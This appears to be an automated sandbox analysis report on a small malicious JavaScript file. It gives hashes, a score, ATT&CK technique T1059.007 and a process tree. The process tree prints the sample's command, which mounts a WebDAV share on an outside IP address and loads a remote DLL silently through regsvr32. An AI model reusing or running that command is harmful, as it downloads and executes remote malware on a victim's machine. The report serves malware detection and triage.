418176a9393ff318ce24c050fd13333a526cf6389be8f3e5e42f4c5b7e8085d2

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
24/07/2024, 08:01

Target

1789275291605114582.js
Size

3KB
MD5

9569dfb1f8394b53b317dafcf8779d78
SHA1

628a7674cc51c99492c2aa9821e1b1f24c6b7a5f
SHA256

418176a9393ff318ce24c050fd13333a526cf6389be8f3e5e42f4c5b7e8085d2
SHA512

f431e38fff9ebcb1aa9b65bb08cc589ace84ccba50c05d48eb27d580da2911283615f2d4d7d956c46964c7ab4303d5141c61382ef2c892ffe70bc863adad29ca

Score

3^/10

execution

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 2528	1500	wscript.exe	30
PID 1500 wrote to memory of 2528	1500	wscript.exe	30
PID 1500 wrote to memory of 2528	1500	wscript.exe	30
PID 2528 wrote to memory of 1936	2528	cmd.exe	32
PID 2528 wrote to memory of 1936	2528	cmd.exe	32
PID 2528 wrote to memory of 1936	2528	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1789275291605114582.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\1729021491505.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:1936

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

JavaScript

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact